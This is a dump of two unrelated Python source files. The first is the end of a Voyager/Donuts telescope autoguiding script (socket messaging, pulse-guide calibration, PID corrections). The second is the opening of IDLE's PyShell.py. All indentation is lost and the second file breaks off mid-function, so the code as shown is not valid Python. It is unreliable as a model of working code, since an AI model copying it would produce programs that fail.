Parameters
----------
None
Returns
-------
None
Raises
------
None
"""
self.socket = s.socket(s.AF_INET, s.SOCK_STREAM)
self.socket.settimeout(1.0)
try:
self.socket.connect((self.socket_ip, self.socket_port))
except s.error:
logging.fatal('Voyager socket connect failed!')
logging.fatal('Check the application interface is running!')
traceback.print_exc()
sys.exit(1)
def __close_socket(self):
"""
Close the socket once finished
Parameters
----------
None
Returns
-------
None
Raises
------
None
"""
self.socket.close()
def __send(self, message, n_attempts=3):
"""
Low level message sending method. Note no listening
is done here.
Parameters
----------
message : string
message to communicate to Voyager
n_attempts: int, optional
default = 3
max number of tries to send, before giving up
Returns
-------
sent : boolean
Did the message send ok?
True or False
Raises
------
None
"""
sent = False
while not sent and n_attempts > 0:
n_attempts -= 1
try:
# send the command
self.socket.sendall(bytes(message, encoding='utf-8'))
sent = True
# update the last poll time
self._last_poll_time = time.time()
logging.debug(f"SENT: {message.rstrip()}")
except:
logging.error(f"CANNOT SEND {message} TO VOYAGER [{n_attempts}]")
traceback.print_exc()
sent = False
return sent
def __receive(self, n_bytes=2048):
"""
Receive a message of n_bytes in length from Voyager
Parameters
----------
n_bytes : int, optional
Number of bytes to read from socket
default = 2048
Returns
-------
message : dict
json parsed response from Voyager
Raises
------
None
"""
# NOTE original code, we have JSON decoding errors, trying to figure it out
#try:
# message = json.loads(self.socket.recv(n_bytes))
#except s.timeout:
# message = {}
#return message
# load the raw string
try:
message_raw = self.socket.recv(n_bytes)
except s.timeout:
message_raw = ""
# spit out the raw message
logging.debug(f"__receive: message_raw={message_raw}")
# unpack it into a json object
if message_raw != "":
# NOTE sometimes a message is truncated, try to stop it crashing...
try:
message = json.loads(message_raw)
except json.decoder.JSONDecodeError:
message = {}
else:
message = {}
return message
def __receive_until_delim(self, delim=b'\r\n'):
"""
"""
message_buffer = []
n_bytes = 2048
# check if there is any overflow from last time
logging.debug(f"Message overflow {self.message_overflow}")
for msg in self.message_overflow:
logging.debug(f"Moving {msg} to __receive_until_delim message_buffer...")
message_buffer.append(msg)
# reset the overflow
self.message_overflow = []
logging.debug(f"Reset message overflow to {self.message_overflow}")
continue_reading = True
logging.info("Starting read until delim...")
while continue_reading:
try:
message_raw = self.socket.recv(n_bytes)
except s.timeout:
message_raw = b''
logging.debug(f"Message raw {message_raw}")
if delim in message_raw:
logging.debug("DELIM FOUND...")
continue_reading = False
message_end, message_new_start = message_raw.split(b'\r\n')
logging.debug(f"Message raw parts {message_end} : {message_new_start}")
message_buffer.append(message_end)
logging.debug(f"Message buffer: {message_buffer}")
self.message_overflow.append(message_new_start)
logging.debug(f"Message overflow: {self.message_overflow}")
else:
logging.debug("DELIM NOT FOUND, CONTINUING READING...")
continue_reading = True
message_buffer.append(message_raw)
logging.debug(f"Message buffer: {message_buffer}")
logging.info("Done reading until delim...")
message_str = b''.join(message_buffer)
logging.info(f"Final message string: {message_str}")
return json.loads(message_str)
def __keep_socket_alive(self):
"""
Convenience method to keep socket open.
Voyager's internal polling is reset upon
receipt of this message
Parameters
----------
None
Returns
-------
None
Raises
------
None
"""
now = str(time.time())
polling = {"Event": "Polling",
"Timestamp": now,
"Host": self.host,
"Inst": self.inst}
# send the polling string
polling_str = json.dumps(polling) + "\r\n"
_ = self.__send(polling_str)
@staticmethod
def __parse_jsonrpc(response):
"""
Take a jsonrpc response and figure out
what happened. If there is an error result is
missing and error object is there instead
Parameters
----------
response : dict
jsonrpc response from Voyager
Returns
-------
rec_idd : int
response_id, used to match async commands/responses
result : int
result code, 0 = ok, all else = not ok
error_code : int
used to determine type of error
error_msg : string
description of any error
Raises
------
None
"""
# get the response ID
rec_idd = response['id']
try:
result = response['result']
error_code = None
error_msg = None
except KeyError:
result = -1
error_code = response['error']['code']
error_msg = response['error']['message']
return rec_idd, result, error_code, error_msg
@staticmethod
def __parse_remote_action_result(response):
"""
Take a remote action result and see what happened
Parameters
----------
response : dict
Voyager RemoteActionResult response
Returns
-------
uid : string
unique id for the corresponding command
result : int
result code, 4 = ok, all else = not ok
motivo : string
description of any error
param_ret : dict
parameters returned by command
Raises
------
None
"""
result = response['ActionResultInt']
uid = response['UID']
motivo = response['Motivo']
param_ret = response['ParamRet']
return uid, result, motivo, param_ret
def __send_donuts_message_to_voyager(self, event, error=None):
"""
Acknowledge a command from Voyager
Parameters
----------
event : string
name of event to send to Voyager
error : string, optional
description of donuts error
default = None
Returns
-------
None
Raises
------
None
"""
now = str(time.time())
message = {"Event": event,
"Timestamp": now,
"Host": self.host,
"Inst": self.inst}
if error is not None:
message['DonutsError'] = error
# send the command
msg_str = json.dumps(message) + "\r\n"
_ = self.__send(msg_str)
def __send_abort_message_to_voyager(self, uid, idd):
"""
If things go pear shaped and donuts is quitting,
tell Voyager to abort this UID:IDD also
Parameters
----------
uid : string
unique ID for this command
idd : int
unique ID for this command
Returns
-------
None
Raises
------
None
"""
message = {'method': 'RemoteActionAbort',
'params': {'UID': uid},
'id': idd}
msg_str = json.dumps(message) + "\r\n"
# send the command
_ = self.__send(msg_str)
def __send_two_way_message_to_voyager(self, message):
"""
Issue any two way command to Voyager
Wait for the initial jsonrpc response, act accordingly
If all good, wait for the RemoteActionResult event, act accordingly
The helper Message class (above) allows for easy creation
of the message objects (dictionaries) to pass to this method
Parameters
----------
message : dict
A message object containing the relevant json info
for the command we want to send to Voyager
Returns
-------
None
Raises
------
Exception : When unable to send message
"""
# grab this message's UID and ID values
uid = message['params']['UID']
idd = message['id']
msg_str = json.dumps(message) + "\r\n"
# initialise an empty response class
# add the OK status we want to see returned
response = Response(uid, idd, self._msg.OK)
# loop until both responses are received
cb_loop_count = 0
while not response.uid_recv:
# loop until we get a valid response to issuing a command
while not response.idd_recv:
# try sending the message and then waiting for a response
sent = False
while not sent:
# send the command
sent = self.__send(msg_str)
if sent:
logging.debug(f"CALLBACK ADD: {uid}:{idd}")
logging.debug(f"JSONRPC CALLBACK LOOP [{cb_loop_count+1}]: {uid}:{idd}")
rec = self.__receive_until_delim()
# handle the jsonrpc response (1 of 2 responses needed)
if "jsonrpc" in rec.keys():
logging.debug(f"RECEIVED: {rec}")
rec_idd, result, err_code, err_msg = self.__parse_jsonrpc(rec)
# we only care bout IDs for the commands we just sent right now
if rec_idd == idd:
# result = 0 means OK, anything else is bad
# leave this jsonrpc check hardcoded
if result != 0:
logging.error(f"Problem with command id: {idd}")
logging.error(f"{err_code} {err_msg}")
# Leo said if result!=0, we have a serious issue. Therefore abort.
self.__send_abort_message_to_voyager(uid, idd)
raise Exception(f"ERROR: Could not send message {msg_str}")
else:
logging.debug(f"Command id: {idd} returned correctly")
# add the response if things go well. if things go badly we're quitting anyway
response.idd_received(result)
else:
logging.warning(f"Waiting for idd: {idd}, ignoring response for idd: {rec_idd}")
# increment loop counter to keep track of how long we're waiting
cb_loop_count += 1
# if we exit the while loop above we can assume that
# we got a jsonrpc response to the pulse guide command
# here we start listening for it being done
logging.debug(f"EVENT CALLBACK LOOP [{cb_loop_count+1}]: {uid}:{idd}")
rec = self.__receive_until_delim()
# handle the RemoteActionResult response (2 of 2 needed)
if "Event" in rec.keys():
if rec['Event'] == "RemoteActionResult":
logging.debug(f"RECEIVED: {rec}")
rec_uid, result, *_ = self.__parse_remote_action_result(rec)
# check we have a response for the thing we want
if rec_uid == uid:
# result = 4 means OK, anything else is an issue
if result != self._msg.OK:
logging.error(f"Problem with command uid: {uid}")
logging.error(f"{rec}")
# TODO: Consider adding a RemoteActionAbort here if shit hits the fan
else:
logging.debug(f"Command uid: {uid} returned correctly")
# add the response, regardless if it's good or bad, so we can end this loop
response.uid_received(result)
else:
logging.warning(f"Waiting for uid: {uid}, ignoring response for uid: {rec_uid}")
elif rec['Event'] in self._INFO_SIGNALS:
logging.debug(f"RECEIVED: {rec}")
else:
logging.warning(f"Unknown response {rec}")
# no response? do nothing
elif not rec.keys():
pass
else:
logging.warning(f"Unknown response {rec}")
# keep the connection alive while waiting
now = time.time()
time_since_last_poll = now - self._last_poll_time
if time_since_last_poll > 5:
# ping the keep alive
self.__keep_socket_alive()
# increment event loop counter
cb_loop_count += 1
# check was everything ok and raise an exception if not
if not response.all_ok():
raise Exception(f"ERROR: Could not send message {msg_str}")
def __calibration_filename(self, direction, pulse_time):
"""
Return a calibration filename
Parameters
----------
diection : string
Direction of offset applied to this calibration image
pulse_time : int
Number of ms the telescope was pulse guided for
in the direction above
Returns
-------
path : string
Filename/path to use for saving a calibration image
Raises
------
None
"""
return f"{self._calibration_dir}/step_{self._image_id:06d}_d{direction}_{pulse_time}ms{self.image_extension}"
@staticmethod
def __determine_shift_direction_and_magnitude(shift):
"""
Take a donuts shift object and work out
the direction of the shift and the distance
Parameters
----------
shift : Donuts.shift
A shift object containing the offset between
two images from Donuts
Returns
-------
direction : string
The direction of the offset
magnitude : float
The magnitude of the shift in pixels
Raises
------
None
"""
sx = shift.x.value
sy = shift.y.value
if abs(sx) > abs(sy):
if sx > 0:
direction = '-x'
else:
direction = '+x'
magnitude = abs(sx)
else:
if sy > 0:
direction = '-y'
else:
direction = '+y'
magnitude = abs(sy)
return direction, magnitude
@staticmethod
def __append_to_file(path, line):
"""
Take a line and append it to a file
Parameters
----------
path : str
path to file to append to
line : str
line to append to file
Returns
-------
None
Raises
------
None
"""
with open(path, 'a') as of:
of.write(line)
def __calibrate_donuts(self):
"""
Run the calibration routine. Here we take and
image, nudge the telescope, take another and
repeat for the 4 directions. Then we use donuts
to determine the shift and calibrate the pulse
guide command.
Parameters
----------
None
Returns
-------
None
Raises
------
None
"""
# set up objects to hold calib info
self._direction_store = defaultdict(list)
self._scale_store = defaultdict(list)
# set up calibration directory
self._calibration_dir = vutils.get_data_dir(self.calibration_root, windows=False)
# set up a calibration output filename in that directory
tnow = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')
self._calibration_results_path = f"{self._calibration_dir}/donuts_calibration_{tnow}.txt"
# point the telescope to 1h west of the meridian
# get the reference filename
filename_cont = self.__calibration_filename("R", 0)
filename_host = self.__resolve_host_path("calib", filename_cont)
# create a command uuid
shot_uuid = str(uuid.uuid4())
# take an image at the current location
try:
message_shot = self._msg.camera_shot(shot_uuid, self._comms_id, self.calibration_exptime, "true", filename_host)
self.__send_two_way_message_to_voyager(message_shot)
self._comms_id += 1
self._image_id += 1
except Exception:
self.__send_donuts_message_to_voyager("DonutsCalibrationError", f"Failed to take image {filename_host}")
# make the image we took the reference image
donuts_ref = Donuts(filename_cont, subtract_bkg=self.donuts_subtract_bkg)
# loop over the 4 directions for the requested number of iterations
for _ in range(self.calibration_n_iterations):
for i in range(4):
# pulse guide in direction i
try:
uuid_i = str(uuid.uuid4())
message_pg = self._msg.pulse_guide(uuid_i, self._comms_id, i, self.calibration_step_size_ms)
# send pulse guide command in direction i
self.__send_two_way_message_to_voyager(message_pg)
self._comms_id += 1
except Exception:
# send a recentering error
self.__send_donuts_message_to_voyager("DonutsRecenterError", f"Failed to PulseGuide {i} {self.calibration_step_size_ms}")
traceback.print_exc()
# take an image
try:
# get the filenames
filename_cont = self.__calibration_filename(i, self.calibration_step_size_ms)
filename_host = self.__resolve_host_path("calib", filename_cont)
shot_uuid = str(uuid.uuid4())
message_shot = self._msg.camera_shot(shot_uuid, self._comms_id, self.calibration_exptime, "true", filename_host)
self.__send_two_way_message_to_voyager(message_shot)
self._comms_id += 1
self._image_id += 1
except Exception:
self.__send_donuts_message_to_voyager("DonutsCalibrationError", f"Failed to take image {filename_host}")
# measure the offset and update the reference image
shift = donuts_ref.measure_shift(filename_cont)
direction, magnitude = self.__determine_shift_direction_and_magnitude(shift)
logging.info(f"SHIFT: {direction} {magnitude}")
self._direction_store[i].append(direction)
self._scale_store[i].append(magnitude)
donuts_ref = Donuts(filename_cont, subtract_bkg=self.donuts_subtract_bkg)
# now do some analysis on the run from above
# check that the directions are the same every time for each orientation
for direc in self._direction_store:
logging.info(self._direction_store[direc])
if len(set(self._direction_store[direc])) != 1:
logging.error(f"ERROR: PROBLEM WITH CALIBRATED DIRECTION {self._direction_store[direc]}")
logging.info(f"{direc}: {self._direction_store[direc][0]}")
# write out the direction_store contents for easy finding
line = f"{direc} {self._direction_store[direc]}\n"
self.__append_to_file(self._calibration_results_path, line)
# now work out the ms/pix scales from the calbration run above
for direc in self._scale_store:
ratio = self.calibration_step_size_ms/np.average(self._scale_store[direc])
logging.info(f"{direc}: {ratio:.2f} ms/pixel")
# write out the scale_store contents for easy finding
line = f"{direc}: {self._scale_store[direc]}\n"
self.__append_to_file(self._calibration_results_path, line)
# write out the average correction too
line = f"{direc}: {ratio:.2f} ms/pixel\n"
self.__append_to_file(self._calibration_results_path, line)
# print out the storage areas for reference in case some bad measurements were made
for direc in self._direction_store:
logging.info(f"Direction store: {direc} {self._direction_store[direc]}")
logging.info(f"Scale store: {direc} {self._scale_store[direc]}")
def __initialise_pid_loop(self, stabilised):
"""
(Re)initialise the PID loop objects
for the X and Y directions
Parameters
----------
stabilised : boolean
Are we stabilised or not?
Returns
-------
None
Raises
------
None
"""
if stabilised:
# initialise the PID loop with the coeffs from config
self._pid_x = PID(self.pid_x_p, self.pid_x_i, self.pid_x_d)
self._pid_y = PID(self.pid_y_p, self.pid_y_i, self.pid_y_d)
else:
# force 100% proportional during stabilisation
self._pid_x = PID(1.0, 0.0, 0.0)
self._pid_y = PID(1.0, 0.0, 0.0)
# set the PID set points (typically 0)
self._pid_x.setPoint(self.pid_x_setpoint)
self._pid_y.setPoint(self.pid_y_setpoint)
def __initialise_guide_buffer(self):
"""
(Re) initialise the ag measurement buffer.
Clears the buffer lists for a new field/filter
Parameters
----------
None
Returns
-------
None
Raises
------
None
"""
self._buff_x = []
self._buff_y = []
def __get_null_correction(self):
"""
Return an empty correction
Parameters
----------
None
Returns
-------
direction : dict
Direction object for correction
duration : dict
Duration object for correction
Raises
------
None
"""
direction = {"x": self.guide_directions["+x"],
"y": self.guide_directions["+y"]}
duration = {"x": 0, "y": 0}
return direction, duration
def __truncate_correction(self, x, y):
"""
Apply a pass filter on the corrections
if needed.
Parameters
----------
x : float
X correction
y : float
Y correction
Returns
-------
xt : float
Filtered x correction (if needed)
yt : float
Filtered y correction (if needed)
Raises
------
None
"""
# filter x
if x >= self.max_error_pixels:
xt = self.max_error_pixels
elif x <= -self.max_error_pixels:
xt = -self.max_error_pixels
else:
xt = x
# filter y
if y >= self.max_error_pixels:
yt = self.max_error_pixels
elif y <= -self.max_error_pixels:
yt = -self.max_error_pixels
else:
yt = y
return xt, yt
def __determine_direction_and_duration(self, x, y, cos_dec):
"""
Take the correction in X and Y in pixels
and convert it to a direction and duration object
for pulse guide
Parameters
----------
x : float
X correction
y : float
Y correction
Returns
-------
direction : dict
direction object for correction
duration : dict
duration object for correction
Raises
------
None
"""
# determine the directions and scaled shifr magnitudes (in ms) to send
# abs() on -ve duration otherwise throws back an error
if 0 < x <= self.max_error_pixels:
guide_time_x = x * self.pixels_to_time['+x']
if self.ra_axis == 'x':
guide_time_x = guide_time_x/cos_dec
guide_direction_x = self.guide_directions["+x"]
elif 0 > x >= -self.max_error_pixels:
guide_time_x = abs(x * self.pixels_to_time['-x'])
if self.ra_axis == 'x':
guide_time_x = guide_time_x/cos_dec
guide_direction_x = self.guide_directions["-x"]
else:
guide_time_x = 0
guide_direction_x = self.guide_directions["+x"]
if 0 < y <= self.max_error_pixels:
guide_time_y = y * self.pixels_to_time['+y']
if self.ra_axis == 'y':
guide_time_y = guide_time_y/cos_dec
guide_direction_y = self.guide_directions["+y"]
elif 0 > y >= -self.max_error_pixels:
guide_time_y = abs(y * self.pixels_to_time['-y'])
if self.ra_axis == 'y':
guide_time_y = guide_time_y/cos_dec
guide_direction_y = self.guide_directions["-y"]
else:
guide_time_y = 0
guide_direction_y = self.guide_directions["+y"]
# bake these final values into the direction/duration results
direction = {"x": guide_direction_x,
"y": guide_direction_y}
duration = {"x": guide_time_x,
"y": guide_time_y}
return direction, duration
def __process_guide_correction(self, shift):
"""
Take a Donuts shift object. Analyse the x and y
components. Compare them to the recent history of
corrections and reject outliers. Additionally, pass
x and y corrections through a PID loop and trim results
to the max allowed guide correction, if required
Parameters
----------
shift : Donuts.shift object
Contains the X and Y offset values for a
recently analysed image
Returns
-------
direction : dict
Correction directions to apply for X and Y
duration : dict
Correction pulse guide durations to apply
for X and Y
"""
# get x and y from shift object
shift_x = shift.x.value
shift_y = shift.y.value
# handle big shifts during stabilisation and when stabilised
if (abs(shift_x) > self.max_error_pixels or abs(shift_y) > self.max_error_pixels) and self._stabilised:
logging.warning(f"Offset larger than max allowed shift {self.max_error_pixels}: x: {shift_x} y:{shift_y}")
logging.warning("Skipping this correction...")
# make a shift arguments tuple to store in the database
shift_args = (self._ref_file, self._latest_guide_frame, self._stabilised, shift_x, shift_y,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1, 1)
# log the culled correction to the database
vdb.log_shifts_to_db(shift_args)
direction, duration = self.__get_null_correction()
return direction, duration
# if we're stabilising, limit big shifts to the max value during this phase
elif (abs(shift_x) > self.max_error_pixels or abs(shift_y) > self.max_error_pixels) and not self._stabilised:
# if x is too big, limit it
pre_pid_x, pre_pid_y = self.__truncate_correction(shift_x, shift_y)
else:
pre_pid_x = shift_x
pre_pid_y = shift_y
# handle stabilisation
if not self._stabilised and pre_pid_x < 2 and pre_pid_y < 2:
# set flag
self._stabilised = True
# reset the number of images to stabilise for next time
self._images_to_stabilise = self.n_images_to_stabilise
# log a message
logging.info("Stabilisation complete, reseting PID loop")
# reset the pid loop
self.__initialise_pid_loop(stabilised=True)
# reset the guide buffer
self.__initialise_guide_buffer()
# continue trying to stabilise
elif not self._stabilised and (pre_pid_x > 2 or pre_pid_y > 2) and self._images_to_stabilise >= 0:
# keep forcing 100% proportional correction
self.__initialise_pid_loop(stabilised=False)
self._images_to_stabilise -= 1
# check if we've been trying to stabilise for too long
elif not self._stabilised and (pre_pid_x > 2 or pre_pid_y > 2) and self._images_to_stabilise < 0:
logging.error(f"We've been trying to stabilise >{self.n_images_to_stabilise} images")
logging.error("There appears to be an error, quiting donuts")
self.__send_donuts_message_to_voyager("DonutsRecenterError", "Failed to stabilise guiding")
sys.exit(1)
else:
pass
# get telescope declination to scale RA corrections
dec_rads = np.radians(self._declination)
cos_dec = np.cos(dec_rads)
# handle comparisons to the guide buffer
# pop the earliest buffer value if > N measurements
while len(self._buff_x) > self.guide_buffer_length:
self._buff_x.pop(0)
while len(self._buff_y) > self.guide_buffer_length:
self._buff_y.pop(0)
assert len(self._buff_x) == len(self._buff_y)
# kill anything that is > sigma_buffer sigma buffer stats, but only after buffer is full
# otherwise, wait to get better stats
if len(self._buff_x) < self.guide_buffer_length and len(self._buff_y) < self.guide_buffer_length:
logging.info("Filling AG stats buffer")
self._buff_x_sigma = 0.0
self._buff_y_sigma = 0.0
else:
self._buff_x_sigma = np.std(self._buff_x)
self._buff_y_sigma = np.std(self._buff_y)
if abs(pre_pid_x) > self.guide_buffer_sigma * self._buff_x_sigma or abs(pre_pid_y) > self.guide_buffer_sigma * self._buff_y_sigma:
# store the original values in the buffer, even if correction
# was too big, this will allow small outliers to be caught
logging.warning(f"Guide correction(s) too large x:{pre_pid_x:.2f} y:{pre_pid_y:.2f}")
self._buff_x.append(pre_pid_x)
self._buff_y.append(pre_pid_y)
# make a shift arguments tuple to store in the database
shift_args = (self._ref_file, self._latest_guide_frame, self._stabilised, shift_x, shift_y,
pre_pid_x, pre_pid_y, 0.0, 0.0, 0.0, 0.0, self._buff_x_sigma, self._buff_y_sigma,
1, 1)
# log the culled correction to the database
vdb.log_shifts_to_db(shift_args)
# send back empty correction
direction, duration = self.__get_null_correction()
return direction, duration
# pass corrections through the PID controller
# update the PID controllers, run them in parallel
post_pid_x = self._pid_x.update(pre_pid_x) * -1
post_pid_y = self._pid_y.update(pre_pid_y) * -1
logging.info(f"PID: x:{post_pid_x:.2f} y:{post_pid_y:.2f}")
# check if we went over the max allowed shift
# trim if so, do nothing otherwise
final_x, final_y = self.__truncate_correction(post_pid_x, post_pid_y)
logging.info(f"PID[trunc]: x:{final_x:.2f} y:{final_y:.2f}")
# make a shift arguments tuple to store in the database
shift_args = (self._ref_file, self._latest_guide_frame, self._stabilised, shift_x, shift_y,
pre_pid_x, pre_pid_y, post_pid_x, post_pid_y, final_x, final_y, self._buff_x_sigma,
self._buff_y_sigma, 0, 0)
# log the culled correction to the database
vdb.log_shifts_to_db(shift_args)
# convert correction into direction/duration objects
direction, duration = self.__determine_direction_and_duration(final_x, final_y, cos_dec)
# store the original pre-pid values in the buffer
self._buff_x.append(pre_pid_x)
self._buff_y.append(pre_pid_y)
return direction, duration
def signal_handler(signum, frame):
"""
Handle ctrl+c
"""
EXIT_EVENT.set()
if __name__ == "__main__":
# parse the command line arguments
args = arg_parse()
# handle ctrl+c
signal.signal(signal.SIGINT, signal_handler)
# load the config file
config = vutils.load_config(args.config)
# get the logging level:
if config['logging_level'] == 'debug':
level = logging.DEBUG
else:
level = logging.INFO
# get log location
if config['logging_location'] == 'stdout':
logging.basicConfig(stream=sys.stdout, level=level)
else:
night = vutils.get_tonight()
log_filename = f"{night}_donuts.log"
log_file_path = f"{config['logging_root']}/{log_filename}"
logging.basicConfig(filename=log_file_path,
level=level,
format='%(asctime)s:%(levelname)s:%(name)s:%(message)s')
# set up Voyager/Donuts
voyager = Voyager(config)
# run the script
voyager.run()
|
PyShell.py | #! /usr/bin/env python
from __future__ import print_function
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import io
import linecache
from code import InteractiveInterpreter
from platform import python_version, system
try:
from Tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
sys.exit(1)
import tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
from idlelib import IOBinding
IDENTCHARS = string.ascii_letters + string.digits + "_"
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
import warnings
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way."""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += " %s\n" % line
s += "%s: %s\n" % (category.__name__, message)
return s
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, IOError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath,"r") as old_file:
lines = old_file.readlines()
except IOError:
lines = []
try:
with open(self.breakpointPath,"w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except IOError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
